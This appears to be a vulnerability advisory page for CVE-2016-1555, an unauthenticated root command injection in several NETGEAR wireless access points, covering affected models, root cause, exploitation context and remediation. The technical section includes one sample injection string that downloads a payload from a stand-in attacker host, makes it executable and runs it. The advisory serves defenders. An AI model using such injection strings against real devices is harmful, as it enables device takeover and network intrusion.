What Is NETGEAR Wireless Access Points?
NETGEAR's Wireless Access Point (WAP) product line provides enterprise and small-business Wi-Fi infrastructure. WAP devices extend wireless coverage in offices, retail environments, and hospitality settings, typically managed via a web-based configuration interface. NETGEAR is one of the world's largest networking equipment vendors by volume, making vulnerabilities in their WAP products relevant to a large installed base of devices in business environments worldwide.
Embedded networking devices like WAPs run minimal Linux-based firmware with a web server for configuration management. When the web server handles form input without proper sanitization and passes values directly to shell commands, command injection vulnerabilities arise — a common class of vulnerability in embedded device firmware.
Overview
CVE-2016-1555 is a critical unauthenticated OS command injection vulnerability in multiple NETGEAR wireless access point models. The web management interface on affected WAPs allows unauthenticated web pages to pass form input directly to the device's command-line interface (CLI) without adequate sanitization. An attacker can send a crafted HTTP request containing shell metacharacters or injected commands, which the WAP executes with root-level privileges. This provides complete device control — the attacker can modify device configuration, intercept Wi-Fi traffic, pivot to internal networks, or enroll the device in a botnet.
Affected Versions
| NETGEAR Model | Status |
|---|---|
| WN604 | Vulnerable |
| WNAP210v2 | Vulnerable |
| WNAP320 | Vulnerable |
| WNDAP350 | Vulnerable |
| WNDAP360 | Vulnerable |
| WAC720 | Vulnerable |
| WAC730 | Vulnerable |
NETGEAR released firmware updates for some affected models. Check NETGEAR's security advisory PSV-2016-0007 for specific patched firmware versions. Some models may be end-of-life with no available fix.
Technical Details
Root Cause: Form Input Passed Directly to CLI
CVE-2016-1555 involves a fundamental input sanitization failure (CWE-77) in the NETGEAR WAP web management interface. The embedded web server processes HTTP form submissions and constructs shell command strings that include user-provided values. Without stripping or escaping shell metacharacters (;, |, &, `, $(), etc.) from the input, an attacker can inject additional commands:
A crafted form input like:
legitimate_value; wget http://attacker.com/payload -O /tmp/payload; chmod +x /tmp/payload; /tmp/payload
When concatenated into a shell command string and executed, runs all injected commands with the privileges of the web server process — typically root on embedded devices.
Unauthenticated Access
The vulnerability exists on pages that do not require authentication — the WAP's web server serves certain configuration forms before the login check is applied, or the forms themselves can be submitted without a valid session. This eliminates the need for credential compromise as a prerequisite, enabling direct exploitation from the network.
Attack Characteristics
| Attribute | Detail |
|---|---|
| Attack Vector | Network — HTTP request to WAP web interface |
| Authentication | None required |
| Command Execution | Root-level OS command injection |
| Affected Models | WN604, WNAP210v2, WNAP320, WNDAP350, WNDAP360, WAC720, WAC730 |
Discovery
Discovered and reported to NETGEAR in 2016. NVD publication was delayed to April 2017. NETGEAR released patched firmware for applicable models.
Exploitation Context
- IoT botnet enrollment: Unauthenticated command injection on network infrastructure devices is a preferred technique for IoT botnet operators; compromised NETGEAR WAPs can be enrolled in botnets for DDoS amplification, credential harvesting (intercepting cleartext Wi-Fi traffic), or as network pivot points for lateral movement into internal networks
- Enterprise network compromise: Compromising a WAP provides a privileged network position — an attacker with device control can perform ARP poisoning, DNS hijacking, or traffic interception affecting all Wi-Fi clients connected to the compromised access point
- Network device exploitation automation: Automated scanners routinely probe known NETGEAR and other IoT device vulnerabilities; CVE-2016-1555 has been used by automated attack tools targeting internet-exposed WAP management interfaces
- CISA KEV (2022): Added March 2022, confirming continued exploitation of unpatched NETGEAR WAPs in corporate environments
Remediation
-
Apply NETGEAR firmware updates — download and install the latest firmware from NETGEAR's support site for your specific WAP model. Check NETGEAR Security Advisory PSV-2016-0007 for the patched firmware version.
-
Replace end-of-life devices — if no firmware fix is available for your WAP model, replace the device with a currently supported NETGEAR WAP or equivalent from another vendor.
-
Restrict management interface access — firewall the WAP web management interface to allow access only from authorized administrator IP addresses (or the management VLAN). The management interface should never be internet-accessible.
-
Isolate WAPs from sensitive networks — place wireless access points in a dedicated VLAN separate from sensitive corporate network segments; even if an attacker compromises a WAP, network segmentation limits lateral movement options.
-
Monitor for anomalous device behavior — unusual outbound connections from WAP IP addresses, configuration changes, or unexpected device reboots may indicate compromise.
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2016-1555 |
| Vendor / Product | NETGEAR — Wireless Access Point (WAP) Devices |
| NVD Published | 2017-04-21 |
| NVD Last Modified | 2025-10-22 |
| CVSS 3.1 Score | 9.8 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-77 — Improper Neutralization of Special Elements used in a Command ('Command Injection') find similar ↗ |
| CISA KEV Added | 2022-03-25 |
| CISA KEV Deadline | 2022-04-15 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
Required Action
Timeline
| Date | Event |
|---|---|
| 2016 | CVE-2016-1555 vulnerability discovered in multiple NETGEAR WAP models |
| 2017-04-21 | CVE-2016-1555 published by NVD (delayed disclosure) |
| 2022-03-25 | Added to CISA Known Exploited Vulnerabilities catalog |
| 2022-04-15 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| NVD — CVE-2016-1555 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |
| NETGEAR Security Advisory PSV-2016-0007 — Remote Code Execution on Wireless Access Points | Vendor Advisory |